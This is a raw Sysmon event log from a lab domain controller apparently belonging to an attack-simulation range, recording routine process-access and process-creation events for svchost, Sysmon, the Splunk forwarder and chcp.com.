15:53:04.818{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005808Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.818{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005807Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.818{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005806Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.818{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005805Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.818{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005804Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.818{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005803Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.818{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005802Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.818{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005801Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.818{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CE0-5FA1-3701-000000008801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005800Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.818{D28789B6-7CDE-5FA1-2301-000000008801}35642604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7CE0-5FA1-3701-000000008801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005799Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.828{D28789B6-7CE0-5FA1-3701-000000008801}4516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CDE-5FA1-2301-000000008801}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000005798Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.771{D28789B6-7CE0-5FA1-3401-000000008801}45684564C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005797Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.755{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE0-5FA1-3601-000000008801}3924C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005796Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005795Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005794Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005793Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005792Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005791Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005790Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005789Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005788Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005787Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.755{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CE0-5FA1-3601-000000008801}3924C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005786Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.755{D28789B6-7CE0-5FA1-3501-000000008801}34044080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE0-5FA1-3601-000000008801}3924C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319332ed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318854ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30d949de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30df2ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd63a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dc8328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd485b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd444e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318854ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dbaca9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dba279(wow64) 154100x80000000000000005785Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.763{D28789B6-7CE0-5FA1-3601-000000008801}3924C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 